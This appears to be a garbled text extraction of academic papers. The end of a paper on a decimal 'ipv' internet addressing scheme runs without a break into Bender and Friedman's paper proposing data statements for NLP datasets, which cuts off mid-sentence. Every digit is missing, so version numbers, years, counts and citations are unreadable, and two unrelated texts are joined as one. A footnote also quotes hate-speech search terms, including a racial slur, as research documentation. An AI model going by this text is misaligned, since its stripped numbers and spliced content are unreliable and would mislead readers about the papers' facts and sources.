end-to-end transmission can be achieved according to the requirements, which have high efficiency and economy. the ipv address uses a technique of two-sided compression and a number of brackets in the compression section, which is simple and convenient to use. ) safe and controllable ipv uses a specific encryption mechanism for the address to achieve point-to-point transmission to enhance the privacy of users. in order to ensure the healthy and orderly development of information services, the means of verification before communication can be temporarily closed to businesses with incomplete or unqualified security measures. ipv is independent of ipv and ipv internet networking. it can effectively manage and control network security and information security. according to the actual needs, users can choose valuable information download, methods to avoid intrusion of bad information and unexpected attacks. ) unified coding the domain name and the ip address synthesize, may cause the telephone, the handset, the domain name and the ip address, iptv, the ip telephone and so on to combine into one number. this method saves the translation time between the domain name and the ip address, makes the network communication fast and convenient, and improves the communication capability of the existing network switching equipment. at present, electronic labels and bar codes are used and managed separately. ipv has developed more superior and more viable rfid electronic tags, barcode unified data format and application standard g g international journal of advanced network, monitoring and controls volume , no. , system. it can make the electronic label and barcode unified into a code, so that a commodity code has three ways of identification: one-dimensional barcode, two-dimensional code and electronic label, the three represents are global unique code, and also are the ip address of the ipv domain name. this feature enables barcodes and electronic tags have the same internet access capabilities, which will greatly reduce the management costs of the global manufacturing and logistics industries. acknowledgment this paper is sponsored by the xi'an decimal network technology co., ltd.. reference [ ] xie jianping etc. method of using whole digital code to assign address for computer [p].us: , . . [ ] rfc - internet standard. internet protocol, darpa internet program protocol specification, rfc , . . [ ] s. deering, r. hinden, network working group. internet protocol version (ipv ) specification, rfc- , . . [ ] m. crawford. network working group. transmission of ipv packets over ethernet networks. rfc- , . . [ ] j. onions, network working group. a historical perspective on the usage of ip version . rfc . . . [ ] v. cerf, network working group. a view from the st century, rfc . . . [ ] xie jianping, xu dongmei, etc.digital domain name specification. sj/t - , . . [ ] information technology-future network- problem statement and requirement-part : naming and addressing, iso/iec dtr - , , . [ ] wenfeng, xie jianping, etc. product and service digital identification format for information procession. sj/t - , . . [ ] radio frequency identification tag information query service network architecture technical specification. sj/t - , . . data statements for natural language processing: toward mitigating system bias and enabling better science emily m. bender department of linguistics university of washington ebender@uw.edu batya friedman the information school university of washington batya@uw.edu abstract in this paper, we propose data statements as a design solution and professional prac- tice for natural language processing technol- ogists, in both research and development — through the adoption and widespread use of data statements, the field can begin to address critical scientific and ethical issues that result from the use of data from cer- tain populations in the development of tech- nology for other populations. we present a form that data statements can take and explore the implications of adopting them as part of regular practice. we argue that data statements will help alleviate issues re- lated to exclusion and bias in language tech- nology; lead to better precision in claims about how nlp research can generalize and thus better engineering results; protect com- panies from public embarrassment; and ul- timately lead to language technology that meets its users in their own preferred lin- guistic style and furthermore does not mis- represent them to others. introduction as technology enters widespread societal use it is important that we, as technologists, think critically about how the design decisions we make and sys- tems we build impact people — including not only users of the systems but also other people who will be affected by the systems without directly inter- acting with them. for this paper, we focus on nat- ural language processing (nlp) technology. po- tential adverse impacts include nlp systems that fail to work for specific subpopulations (e.g. chil- dren or speakers of language varieties which are not supported by training or test data) or systems that reify and reinforce biases present in training data (e.g. a resume-review system that ranks fe- male candidates as less qualified for computer pro- gramming jobs because of biases present in train- ing text). there are both scientific and ethical rea- sons to be concerned. scientifically, there is the issue of generalizability of results; ethically, the potential for significant real-world harms. while there is increasing interest in ethics in nlp, there remains the open and urgent question of how we integrate ethical considerations into the everyday practice of our field. this question has no simple answer, but rather will require a constellation of multi-faceted solutions. toward that end, and drawing on value sen- sitive design (friedman et al., ), this pa- per contributes one new professional practice — called data statements — which we argue will bring about improvements in engineering and sci- entific outcomes while also enabling more ethi- cally responsive nlp technology. a data state- ment is a characterization of a dataset which pro- vides context to allow developers and users to better understand how experimental results might generalize, how software might be appropriately deployed, and what biases might be reflected in systems built on the software. in developing this practice, we draw on analogous practices from the fields of psychology and medicine that re- quire some standardized information about the populations studied (e.g. apa ; moher et al. ; furler et al. ; mbuagbaw et al. ). though the construct of data statements applies more broadly, in this paper we focus specifically on data statements for nlp systems. data state- ments should be included in most writing on nlp including: papers presenting new datasets, papers reporting experimental work with datasets, and this interest has manifested in workshops (fort et al., ; devillers et al., ; hovy et al., ) and papers (hovy and spruit, ) in nlp, as well as workshops in related fields, notably the fatml series (http://www. fatml.org/) held annually since . http://www.fatml.org/ http://www.fatml.org/ to appear in transactions of the acl documentation for nlp systems. data statements should help us as a field engage with the ethical is- sues of exclusion, overgeneralization, and under- exposure (hovy and spruit, ). furthermore, as data statements bring our datasets and their rep- resented populations into better focus, they should also help us as a field deal with scientific issues of generalizability and reproducibility. adopting this practice will position us to better understand and describe our results and, ultimately, do better and more ethical science and engineering. we begin by defining terms (§ ), discuss why nlp needs data statements (§ ) and relate our pro- posal to current practice (§ ). next is the sub- stance of our contribution: a detailed proposal for data statements for nlp (§ ), illustrated with two case studies (§ ). in § we discuss how data state- ments can mitigate bias and use the technique of ‘value scenarios’ to envision potential effects of their adoption. finally, we relate data statements to similar emerging proposals (§ ), make recom- mendations for how to implement and promote the uptake of data statements (§ ), and lay out consid- erations for tech policy (§ ). definitions as this paper is intended for at least two dis- tinct audiences (nlp technologists and tech pol- icymakers), we use this section to briefly define key terms. dataset, annotations an (nlp) dataset is a collection of speech or writing possibly combined with annotations. annotations include indica- tions of linguistic structure like part of speech tags or syntactic parse trees, as well as labels classify- ing aspects of what the speakers were attempting to accomplish with their utterances. the latter in- cludes annotations for sentiment (liu, ) and for figurative language or sarcasm (e.g. riloff et al. ; ptáček et al. ). labels can be naturally occurring, such as star ratings in reviews taken as indications of the overall sentiment of the review (e.g. pang et al. ) or the hashtag #sarcasm by arguing here that data statements promote both eth- ical practice and sound science, we do not mean to suggest that these two can be conflated. a system can give accurate responses as measured by some test set (scientific soundness) and yet lead to real-world harms (ethical issues). accord- ingly, it is up to researchers and research communities to en- gage with both scientific and ethical ideals. multi-modal data sets combine language and video or other additional signals. here, our focus is on linguistic data. used to identify sarcastic language (e.g. kreuz and caucci ). speaker we use the term speaker to refer to the individual who produced some segment of linguis- tic behavior included in the dataset, even if the lin- guistic behavior is originally written. annotator annotator refers to people who as- sign annotations to the raw data, including tran- scribers of spoken data. annotators may be crowdworkers or highly trained researchers, some- times involved in the creation of the annota- tion guidelines. annotation is often done semi- automatically, with nlp tools being used to create a first pass which is corrected or augmented by hu- man annotators. curator a third role in dataset creation, less commonly discussed, is the curator. curators are involved in the selection of which data to in- clude, by selecting individual documents, by cre- ating search terms that generate sets of documents, by selecting speakers to interview and designing interview questions, etc. stakeholders stakeholders are people impacted directly or indirectly by a system (friedman et al., ; czeskis et al., ). direct stakeholders include those who interact with the system, ei- ther by participating in system creation (develop- ers, speakers, annotators and curators) or by using it. indirect stakeholders do not use the system but are nonetheless impacted by it. for example, peo- ple whose web content is displayed or rendered invisible by search engine algorithms are indirect stakeholders with respect to those systems. algorithm we use the term algorithm to en- compass both rule-based and machine learning ap- proaches to nlp. some algorithms (typically rule- based ones) are tightly connected to the datasets they are developed against. other algorithms can be easily ported to different datasets. system we use the term (nlp) system to re- fer to a piece of software that does some kind of natural language processing, typically involv- ing algorithms trained on particular datasets. we use this term to refer to both components focused on specific tasks (e.g. the stanford parser (klein and manning, ) trained on the penn treebank datasets used during algorithm development can influ- ence design choices in machine learning approaches too: munro and manning ( ) found that subword information, not helpful in english sms classification, is extremely valu- able in chichewa, a morphologically complex language with high orthographic variability. (marcus et al., ) to do english parsing) and user-facing products such as amazon’s alexa or google home. bias we use the term bias to refer to cases where computer systems “systematically and un- fairly discriminate against certain individuals or groups of individuals in favor of others” (fried- man and nissenbaum, , ). to be clear: (i) unfair discrimination does not give rise to bias unless it occurs systematically and (ii) systematic discrimination does not give rise to bias unless it results in an unfair outcome. friedman and nis- senbaum ( ) show that in some cases, sys- tem bias reflects biases in society; these are pre- existing biases with roots in social institutions, practices and attitudes. in other cases, reasonable, seemingly neutral, technical elements (e.g. the or- der in which an algorithm processes data) can re- sult in bias when used in real world contexts; these technical biases stem from technical constraints and decisions. a third source of bias, emergent bias, occurs when a system designed for one con- text is applied in another, e.g. with a different pop- ulation. why does nlp need data statements? recent studies have documented the fact that lim- itations in training data lead to ethically problem- atic limitations in the resulting nlp systems. sys- tems trained on naturally occurring language data learn the pre-existing biases held by the speakers of that data: typical vector-space representations of lexical semantics pick up cultural biases about gender (bolukbasi et al., ) and race, ethnic- ity and religion (speer, ). zhao et al. ( ) show that beyond picking up such biases, machine learning algorithms can amplify them. further- more, these biases, far from being inert or simply a reflection of the data, can have real-world con- sequences for both direct and indirect stakehold- ers. for example, speer ( ) found that a sen- timent analysis system rated reviews of mexican restaurants as more negative than other types of food with similar star ratings, because of associa- tions between the word mexican and words with negative sentiment in the larger corpus on which the machine learning community uses the term bias to refer to constraints on what an algorithm can learn, which may prevent it from picking up patterns in a dataset or lead it to relevant patterns more quickly (see coppin , ch. ). this use of the term does not carry connotations of unfair- ness. the word embeddings were trained. (see also kir- itchenko and mohammad .) in these and other ways, pre-existing biases can be trained into nlp systems. there are other studies showing that systems from part of speech taggers (hovy and søgaard, ; jørgensen et al., ) to speech recognition engines (tatman, ) perform bet- ter for speakers whose demographic characteris- tics better match those represented in the training data. these are examples of emergent bias. because the linguistic data we use will always include pre-existing biases and because it is not possible to build an nlp system in such a way that it is immune to emergent bias, we must seek additional strategies for mitigating the scientific and ethical shortcomings that follow from imper- fect datasets. we propose here that foregrounding the characteristics of our datasets can help, by al- lowing reasoning about what the likely effects may be and by making it clearer which populations are and are not represented, for both training and test data. for training data, the characteristics of the dataset will affect how the system will work when it is deployed. for test data, the characteristics of the dataset will affect what can be measured about system performance and thus provides important context for scientific claims. current practice and challenges typical current practice in academic nlp is to present new datasets with a careful discussion of the annotation process as well as a brief charac- terization of the genre (usually by naming the un- derlying data source) and the language. nlp pa- pers using datasets for training or test data tend to more briefly characterize the annotations and will sometimes leave out mention of genre and even language. initiatives such as the open lan- guage archives community (olac; bird and si- mons ), the fostering language resources network (flarenet; calzolari et al. ) and the text encoding initiative (tei; consortium ) prescribe metadata to publish with language re- sources, primarily to aid in the discoverability of such resources. flarenet also encourages doc- umentation of language resources. and yet, it is very rare to find detailed characterization of the speakers whose data is captured or the annotators surveys of eacl (bender, ) and acl (munro, ) found %– % of papers failed to name the language studied. (it always appeared to be english.) who provided the annotations, though the latter are usually characterized as being experts or crowd- workers. to fill this information gap, we argue that data statements should be included in every nlp pub- lication which presents new datasets and in the documentation of every nlp system, as part of a chronology of system development including de- scriptions of the various datasets for training, tun- ing and testing. data statements should also be included in all nlp publications reporting exper- imental results. accordingly, data statements will need to be both detailed and concise. to meet these competing goals, we propose two variants. for each dataset there should be a long-form ver- sion in an academic paper presenting the dataset or in system documentation. research papers pre- senting experiments making use of datasets with existing long-form data statements should include shorter data statements and cite the longer one. we note another set of goals in competition: while readers need as much information as possi- ble in order to understand how the results can and cannot be expected to generalize, considerations of the privacy of the people involved (speakers, annotators) might preclude including certain kinds of information, especially with small groups. each project will need to find the right balance, but this can be addressed in part by asking annotators and speakers for permission to collect and publish such information. proposed data statement schema we propose the following schema of information to include in long and short form data statements. . long form long form data statements should be included in system documentation and in academic papers presenting new datasets, and should strive to pro- vide the following information: a. curation rationale which texts were in- cluded and what were the goals in selecting texts, both in the original collection and in any further a notable exception is derczynski et al. ( ), who present a corpus of tweets collected to sample diverse speaker communities (location, type of engagement with twitter), at diverse points in time (time of year, month, and day), and an- notated with named entity labels by crowdworker annotators from the same locations as the tweet authors. older datasets can be retrofitted with citeable long-form data statements published on project web pages or archives. sub-selection? this can be especially important in datasets too large to thoroughly inspect by hand. an explicit statement of the curation rationale can help dataset users make inferences about what other kinds of texts systems trained with them could conceivably generalize to. b. language variety languages differ from each other in structural ways that can interact with nlp algorithms. within a language, regional or social dialects can also show great variation (chambers and trudgill, ). the language and language variety should be described with: • a language tag from bcp- identifying the language variety (e.g. en-us or yue-hant- hk) • a prose description of the language variety, glossing the bcp- tag and also providing further information (e.g. english as spoken in palo alto ca (usa) or cantonese writ- ten with traditional characters by speakers in hong kong who are bilingual in mandarin) c. speaker demographic sociolinguistics has found that variation (in pronunciation, prosody, word choice, and grammar) correlates with speaker demographic characteristics (labov, ), as speakers use linguistic variation to con- struct and project identities (eckert and rickford, ). transfer from native languages (l ) can affect the language produced by non-native (l ) speakers (ellis, , ch. ). a further impor- tant type of variation is disordered speech (e.g. dysarthria). specifications include: • age • gender • race/ethnicity • native language • socio-economic status • number of different speakers represented • presence of disordered speech d. annotator demographic what are the demographic characteristics of the annotators and annotation guideline developers? their own ‘so- cial address’ influences their experience with lan- guage and thus their perception of what they are annotating. specifications include: • age https://tools.ietf.org/rfc/bcp/bcp . txt https://tools.ietf.org/rfc/bcp/bcp .txt https://tools.ietf.org/rfc/bcp/bcp .txt • gender • race/ethnicity • native language • socio-economic status • training in linguistics/other relevant disci- pline e. speech situation characteristics of the speech situation can affect linguistic structure and patterns at many levels. the intended audience of a linguistic performance can also affect linguistic choices on the part of speakers. the time and place provide broader context for understanding how the texts collected relate to their historical moment and should also be made evident in the data statement. specifications include: • time and place • modality (spoken/signed, written) • scripted/edited v. spontaneous • synchronous v. asynchronous interaction • intended audience f. text characteristics both genre and topic influence the vocabulary and structural char- acteristics of texts (biber, ), and should be specified. g. recording quality for data that includes audio/visual recordings, indicate the quality of the recording equipment and any aspects of the recording situation that could impact recording quality. h. other there may be other information of rel- evance as well (e.g. the demographic characteris- tics of the curators). as stated above, this is in- tended as a starting point and we anticipate best practices around writing data statements to de- velop over time. i. provenance appendix for datasets built out of existing datasets, the data statements for the source datasets should be included as an appendix. . short form short form data statements should be included in any publication using a dataset for training, tuning or testing a system and may also be appropriate for certain kinds of system documentation. the short for example, people speak differently to close friends v. strangers, to small groups v. large ones, to children v. adults and to people v. machines (e.g. ervin-tripp ). mutable speaker demographic information, such as age, is interpreted as relative to the time of the linguistic behavior. form data statement does not replace the long form one, but rather should include a pointer to it. for short form data statements, we envision – word summaries of the description included in the long form, covering most of the main points. . summary we have outlined the kind of information data statements should include, addressing the needs laid out in § , describing both long and short ver- sions. as the field gains experience with data statements, we expect to see a better understand- ing of what to include as well as best practices for writing data statements to emerge. note that full specification of all of this infor- mation may not be feasible in all cases. for ex- ample, in datasets created from web text, precise demographic information may be unavailable. in other cases (e.g. to protect the privacy of annota- tors) it may be preferable to provide ranges rather than precise values. for the description of demo- graphic characteristics, our field can look to others for best practices, such as those described in the american psychological association’s manual of style. it may seem redundant to reiterate this informa- tion in every paper that makes use of well-trodden datasets. however, it is critical to consider the data anew each time to ensure that it is appropriate for the nlp work being undertaken and that the re- sults reported are properly contextualized. note that the requirement is not that datasets be used only when there is an ideal fit between the dataset and the nlp goals but rather that the characteris- tics of the dataset be examined in relation to the nlp goals and limitations be reported as appro- priate. case studies we illustrate the idea of data statements with two cases studies. ideally, data statements are written at or close to the time of dataset creation. these data statements were constructed post hoc in con- versation with the dataset curators. the first en- tails labels for a particular subset of all twitter data. in contrast, the second entails all available data for an intentionally generated interview col- lection, including audiofiles and transcripts. both illustrate how even when specific information is not available, the explicit statement of its lack of availability provides a more informative picture of the dataset. . hate speech twitter annotations the hate speech twitter annotations collection is a set of labels for ∼ , tweets collected by waseem and hovy ( ) and waseem ( ). the dataset can be accessed via https:// github.com/zeerakw/hatespeech. a. curation rationale in order to study the automatic detection of hate speech in tweets and the effect of annotator knowledge (crowd- workers v. experts) on the effectiveness of mod- els trained on the annotations, waseem and hovy ( ) performed a scrape of twitter data using contentious terms and topics. the terms were cho- sen by first crowd-sourcing an initial set of search terms on feminist facebook groups and then re- viewing the resulting tweets for terms to use and adding others based on the researcher’s intuition. additionally, some prolific users of the terms were chosen and their timelines collected. for the an- notation work reported in waseem ( ), expert annotators were chosen for their attitudes with re- spect to intersectional feminism in order to explore whether annotator understanding of hate speech would influence the labels and classifiers built on the dataset. b. language variety the data was col- lected via the twitter search api in late . information about which varieties of english are represented is not available, but at least australian (en-au) and us (en-us) mainstream englishes are both included. c. speaker demographic speakers were not directly approached for inclusion in this dataset and thus could not be asked for demo- graphic information. more than different twitter accounts are included. based on indepen- dent information about twitter usage and impres- sionistic observation of the tweets by the dataset curators, the data is likely to include tweets from this data statement was prepared based on information provided by zeerak waseem, pc, feb-apr and reviewed and approved by him. in a standalone data statement, the search terms should be given in the main text. to avoid accosting readers with slurs in this article, we instead list them in this footnote. waseem and hovy ( ) provide the following complete list of terms used in their initial scrape: ‘mkr’, ‘asian drive’, ‘feminazi’, ‘immigrant’, ‘nigger’, ‘sjw’, ‘womenagainst- feminism’, ‘blameonenotall’, ‘islam terrorism’, ‘notallmen’, ‘victimcard’, ‘victim card’, ‘arab terror’, ‘gamergate’, ‘jsil’, ‘racecard’, ‘race card’. both younger ( – ) and older ( +) adult speak- ers, the majority of whom likely identify as white. no direct information is available about gender distribution or socioeconomic status of the speak- ers. it is expected that most, but not all, of the speakers speak english as a native language. d. annotator demographic this dataset includes annotations from both crowdworkers and experts. , crowdworkers were recruited through crowd flower, primarily from europe, south america and north america. beyond coun- try of residence, no further information is avail- able about the crowdworkers. the expert anno- tators were recruited specifically for their under- standing of intersectional feminism. all were in- formally trained in critical race theory and gender studies through years of activism and personal re- search. they ranged in age from – , included men and women, and gave their ethnicity as white european ( ), east asian ( ), middle east/turkey ( ), and south asian ( ). their na- tive languages were danish ( ), danish/english ( ), turkish/danish ( ), arabic/danish ( ), and swedish ( ). based on income levels, the expert annotators represented upper lower class ( ), mid- dle class ( ), and upper middle class ( ). e. speech situation all tweets were ini- tially published between april and decem- ber . tweets represent informal, largely asyn- chronous, spontaneous, written language, of up to characters per tweet. about % of the tweets were in reaction to a specific australian tv show (my kitchen rules) and so were likely meant for roughly synchronous interaction with other view- ers. the intended audience of the tweets was ei- ther other viewers of the same show, or simply the general twitter audience. for the tweets contain- ing racist hate speech, the authors appear to intend them both for those who would agree but also for people whom they hope to provoke into having an agitational and confrontational exchange. f. text characteristics for racist tweets the topic was dominated by islam and islamopho- bia. for sexist tweets predominant topics were the tv show and people making sexist statements while claiming not to be sexist. the majority of tweets only used one modality (text) though some included links to pictures and websites. g. recording quality n/a. h. other n/a. i. provenance appendix n/a. https://github.com/zeerakw/hatespeech https://github.com/zeerakw/hatespeech twitter hate speech short form this dataset includes labels for ∼ , english tweets from different locales (australia and north america be- ing well-represented) selected to contain a high prevalence of hate speech. the labels indicate the presence and type of hate speech and were pro- vided both by experts (mostly with extensive if informal training in critical race theory and gen- der studies and english as a second language) and by crowdworkers primarily from europe and the americas. [include a link to the long form.] . voices from the rwanda tribunal (vrt) voices from the rwanda tribunal is a collec- tion of video interviews in english and french with personnel from the international criminal tribunal for rwanda (ictr) comprising - hours of material with high quality transcrip- tion throughout (nathan et al., ; nilsen et al., ; friedman et al., ). the dataset can be downloaded from http://www. tribunalvoices.org. a. curation rationale the vrt project, funded by the united states national science foundation, is part of a research program on de- veloping multi-lifespan design knowledge (fried- man and nathan, ). it is independent from the ictr, the united nations, and the government of rwanda. to help ensure accuracy and guard against breeches of confidentiality, interviewees had an opportunity to review and redact any ma- terial that was either misspoken or revealed con- fidential information. a total of two words have been redacted. no other review or redaction of content has occurred. the dataset includes all pub- licly released material from the collection; as of the writing of this data statement ( september ) one interview and a portion of a second are currently sealed. b. language variety of the interviews, are conducted in english (en-us and international english on the part of the interviewees, en-us on the part of the interviewers) and in french and english, with the interviewee speaking inter- national french, the interviewer speaking english (en-us) and an interpreter speaking both. c. speaker demographic the interviewees ( women and men, all adults) are profession- this data statement was prepared based on information provided by co-author batya friedman. at the end of one interview, there is seconds of un- transcribed speech in kinyarwanda (rw). als working in the area of international justice, such as judges or prosecutors, and support roles of the same, such as communications, prison war- den, and librarian. they represent a variety of na- tionalities: argentina, benin, cameroon, canada, england, the gambia, ghana, great britain, in- dia, italy, kenya, madagascar, mali, morocco, nigeria, norway, peru, rwanda, senegal, south africa, sri lanka, st. kitts and nevis, sweden, tanzania, togo, uganda, and the us. their native languages are not known, but are presumably di- verse. the interviewers ( women and men) are informataion and legal professionals from dif- ferent regions in the us. all are native speakers of us english, all are white, and at the time of the interviews they ranged in age from early s to late s. the interpreters are language profes- sionals employed by the ictr with experience in- terpreting between french and english. their age, gender, and native languages are unknown. d. annotator demographic the initial transcription was outsourced to a professional transcription company, so information about these transcribers is unavailable. the english tran- scripts were reviewed by english speaking (en- us) members of the research team for accuracy and then reviewed a third time by an additional english speaking (en-us) member of the team. the french/english transcripts received a sec- ond and third review for accuracy by bi-lingual french/english doctoral students at the university of washington. because of the sensitivity of the topic, the high political status of some intervie- wees (e.g. prosecutor for the tribunal), and the in- ternational stature of the institution, it is very im- portant that interviewees’ comments be accurately transcribed. accordingly, the bar for quality of transcription was set extremely high. e. speech situation the interviews were conducted in autumn at the ictr in arusha, tanzania and in rwanda, face-to-face, as spoken language. the interviewers begin with a prepared set of questions, but most of the interaction is semi-structured. most generally, the speech situa- tion can be characterized as a dialogue, but some of the interviewees give long replies, so stretches may be better characterized as monologues. for the interviewees, the immediate interlocutor is the interviewer, but the intended audience is much larger (see part f below). http://www.tribunalvoices.org http://www.tribunalvoices.org f. text characteristics the interviews were intended to provide an opportunity for tri- bunal personnel to reflect on their experiences working at the ictr and what they would like to share with the people of rwanda, the interna- tional justice community, and the global public now, and years from now. professionals from all organs of the tribunal (judiciary, prosecu- tion, registry) were invited to be interviewed, with effort made to include a broad spectrum of roles (e.g. judges, prosecutor, defense counsel, but also the warden, librarian, language services). intervie- wees expected their interviews to be made broadly accessible. g. recording quality the video inter- views were recorded with high definition equip- ment in closed but not sound-proof offices. there is some background noise. h. other n/a i. provenance appendix n/a. vrt short form the data represents well- vetted transcripts of spoken interviews with personnel from the international criminal tri- bunal for rwanda (ictr) about their experience at the tribunal and reflections on international jus- tice, in international english ( interviews) and french ( interviews with interpreters). intervie- wees are adults working in international justice and support fields at the ictr; interviewers are adult information or legal professionals, highly fluent in en-us; and transcribers are highly edu- cated, highly fluent english and french speakers. [include a link to the long form.] . summary these sample data statements are meant to il- lustrate how the schema can be used to com- municate the specific characteristics of datasets. they were both created post-hoc, in communica- tion with the dataset curators. once data state- ments are created as a matter of best practice, how- ever, they should be developed in tandem with the datasets themselves and may even inform the cu- ration of datasets. at the same time, data state- ments will need to be written for widely used, pre-existing datasets, where documentation may be lacking, memories imperfect, and dataset cu- rators no longer accessible. while retrospective data statements may be incomplete, by and large we believe they can still be valuable. our case studies also underscore how curation rationales shape the specific kinds of texts in- cluded. this is particularly striking in the case of the hate speech twitter annotations, where the specific search terms very clearly shaped the spe- cific kinds of hate speech included and the ways in which any technology or studies built on this dataset will generalize. a tool for mitigating bias we have explicitly designed data statements as a tool for mitigating bias in systems that use data for training and testing. data statements are particu- larly well suited to mitigate forms of emergent and pre-existing bias. for the former, we see benefits at the level of specific systems and of the field: when a system is paired with data statement(s) for the data it is trained on, those deploying it are empowered to assess potential gaps between the speaker populations represented in the training and test data and the populations whose language the system will be working with. at the field level, data statements enable an examination of the en- tire catalog of testing and training datasets to help identify populations who are not yet included. all of these groups are vulnerable to emergent bias, in that any system would by definition have been trained and tested on data from datasets that do not represent them well. data statements can also be instrumental in the diagnosis (and thus mitigation) of pre-existing bias. consider again speer’s ( ) example of mexican restaurants and sentiment analysis. the information that the word vectors were trained on general web text (together with knowledge of what kind of societal biases such text might contain) was key in figuring out why the system consis- tently underestimated the ratings associated with reviews of mexican restaurants. in order to en- able both more informed system development and deployment and audits by users and others of sys- tems in action, it is critical that characterizations of the training and test data underlying systems be available. to be clear, data statements do not in and of themselves solve the entire problem of bias. rather, they are a critical enabling infrastructure. consider by analogy this example from friedman ( ) about access to technology and employ- ment for people with disabilities. in terms of computer system design, we are not so privileged as to determine rigidly the values that will emerge from the systems we design. but neither can we abdicate responsibility. for example, let us for the moment agree [. . . ] that disabled people in the work place should be able to access technology, just as they should be able to access a public build- ing. as system designers we can make the choice to try to construct a tech- nological infrastructure which disabled people can access. if we do not make this choice, then we single-handedly un- dermine the principle of universal ac- cess. but if we do make this choice, and are successful, disabled people would still rely, for example, on employers to hire them. (p. ) similarly, with respect to bias in nlp technology, if we do not make a commitment to data state- ments or a similar practice for making explicit the characteristics of datasets, then we will single- handedly undermine the field’s ability to address bias. in nlp, we expect proposals to come with some kind of evaluation. in this paper, we have demon- strated the substance and ‘writability’ of a data statement through two exemplars (§ ). however, the positive effects of data statements that we an- ticipate (and negative effects we haven’t antici- pated) cannot be demonstrated and tested a priori, as their impact emerges through practice. thus, we look to value sensitive design, which encour- ages us to consider what would happen if a pro- posed technology were to come into widespread use, over longer periods of time, with attention to a wide range of stakeholders, potential benefits, and harms (friedman et al., , ). we do this with value scenarios (nathan et al., ; czeskis et al., ). specifically, we look at two kinds of value scenarios: those concerning nlp technology that fails to take into account an appropriate match between training data and deployment con- text and those that envision possible positive as well as negative consequences stemming from the widespread use of the specific ‘technology’ we are proposing in this paper (data statements). envi- sioning possible negative outcomes allows us to consider how to mitigate such possibilities before they occur. . public health and nlp for social media this value scenario is inspired by jurgens et al. ( ), who provide a similar one to motivate training language id systems on more represen- tative datasets. scenario. big u hospital in a town in the up- per midwest collaborates with the cs department at big u to create a twitter-based early warning system for infectious disease, called diseasealert. big u hospital finds that the system improves pa- tient outcomes by alerting hospital staff to emerg- ing community health needs and alerting physi- cians to test for infectious diseases that currently are active locally. big u decides to make the diseasealert project open source to provide similar benefits to hospi- tals across the anglophone world and is delighted to learn that city hospital in abuja, nigeria is ex- cited to implement diseasealert locally. big u supports city hospital with installing the code, in- cluding localizing the system to draw on tweets posted from abuja. over time, however, city hos- pital finds that the system is leading its physicians to order unnecessary tests and that it is not at all accurate in detecting local health trends. city hos- pital complains to big u about the poor system performance and reports that their reputation is be- ing damaged. big u is puzzled, as the diseasealert performs well in the upper midwest, and they had spent time localizing the system to use tweets from abuja. after a good deal of frustration and in- vestigation into big u’s system, the developers discover that the third-party language id compo- nent they had included was trained on only highly- edited us and uk english text. as a result, it tends to misclassify tweets in regional or non- standard varieties of english as ‘not english’ and therefore not relevant. most of the tweets posted by people living in abuja that city hospital’s sys- tem should have been looking at were thrown out by the system at the first step of processing. analysis. city hospital adopted big u’s open source diseasealert system in exactly the way big u intended. however, the documentation for the language id component lacked critical informa- tion needed to help ensure the localization process would be successful; namely, information about the training and test sets for the system. had big u included data statements for all system compo- nents (including third-party components) in their documentation, then city hospital it staff would have been positioned to recognize the potential limitation of diseasealert and to work proactively with big u to ensure the system performed well in city hospital’s context. specifically, in reviewing data statements for all system components, the it staff could note that the language id component was trained on data unlike what they were seeing in their local tweets and ask for a different lan- guage id component or ask for the existing one to be retrained. in this manner, an emergent bias and its concomitant harms could have been iden- tified and addressed during the system adaptation process prior to deployment. . toward an inclusive data catalog in § . we consider data statements in relation to a particular system. here, we explore their potential to enable better science in nlp overall. scenario. it’s and ‘data statement’ has become a standard section heading for nlp re- search papers and system documentation. hap- pily, reports of mismatch between dataset and community of application leading to biased sys- tems have decreased. yet, research community members articulate an unease regarding which lan- guage communities are and which are not part of the field’s data catalog — the abstract total collec- tion of data and associated meta-data to which the field has access — and the possibility for resulting bias in nlp at a systemic level. in response, several national funding bodies jointly fund a project to discover gaps in knowl- edge. the project compares existing data state- ments to surveys of spoken languages and system- atically maps which language varieties have re- sources (annotated corpora and standard process- ing tools) and which ones lack such resources. the study turns up a large number of language varieties lacking such resources; it also produces a precise list of underserved populations, some of which are quite sizable, suggesting opportunity for impactful intervention at the academic, industry and govern- ment levels. study results in hand, the nlp community em- barks on an intentional program to broaden the language varieties in the data catalog. public dis- cussions lead to criteria for prioritizing language varieties and funding agencies come together to fund collaborative projects to produce state of the art resources for understudied languages. over time, the data catalog becomes more inclusive; bias in the catalog, while not wholly absent, is sig- nificantly reduced and nlp researchers and devel- opers are able to run more comprehensive exper- iments and build technology that serves a larger portion of society. analysis. the nlp community has recognized critical limitations in the field’s existing data cat- alog, leaving many language communities un- derserved (bender, ; munro, ; jurgens et al., ). the widespread uptake of data statements positions the nlp community to docu- ment the degree to which it leaves out certain lan- guage groups and empower itself to systematically broaden the data catalog. in turn, individual nlp systems could be trained on datasets that more closely align with the language of anticipated sys- tem users, thereby averting emergent bias. fur- thermore, nlp researchers can more thoroughly test key research ideas and systems, leading to more reliable scientific results. . anticipating and mitigating barriers finally, we explore one potential negative out- come and how with care it might be mitigated: that of data statements as a barrier to research. scenario. in response to widespread uptake, in the association for computational linguis- tics (acl) proposes that data statements be stan- dardized and required components of research pa- pers. a standards committee is formed, open pub- lic professional discussion is engaged, and in a standard is adopted. it mandates data statements as a requirement for publication, with standard- ized information fields and strict specifications for how these should be completed to facilitate auto- mated meta-analysis. there is great hope that the field will experience increasing benefits from abil- ity to compare, contrast, and build complementary data sets. many of those hopes are realized. however, in a relatively short period of time papers from un- derrepresented regions abruptly decline. in addi- tion, the number of papers from everywhere pro- ducing and reporting on new datasets decline as well. distressed by this outcome, the acl con- the eu-funded project meta-net worked on identi- fying gaps at the level of whole languages for europe, pro- ducing a series of white papers each concerning one european language, available from http://www.meta- net.eu/whitepapers/overview, accessed august http://www.meta-net.eu/whitepapers/overview http://www.meta-net.eu/whitepapers/overview stitutes an ad hoc committee to investigate. a survey of researchers reveals two distinct causes: first, researchers from institutions not yet well represented at acl were having their papers desk- rejected due to missing or insufficient data state- ments. second, researchers who might otherwise have developed a new dataset instead chose to use existing datasets whose data statements could sim- ply be copied. in response, the acl executive de- velops a mentoring service to assist authors in sub- mitting standards-compliant data statements and considers relaxing the standard somewhat in order to encourage more dataset creation. analysis. with any new technology, there can be unanticipated ripple effects — data statements are no exception. here we envision two poten- tial negative impacts, which could both be miti- gated through other practices. importantly, while we recommend the practice of creating data state- ments, we believe that they should be widely used before any standardization takes place. further- more, once a degree of expertise in this area is built up, we recommend that mentoring be put in place proactively. community engagement and mentor- ing will also contribute to furthering ethical dis- course and practice in the field. . summary the value scenarios described here point to key 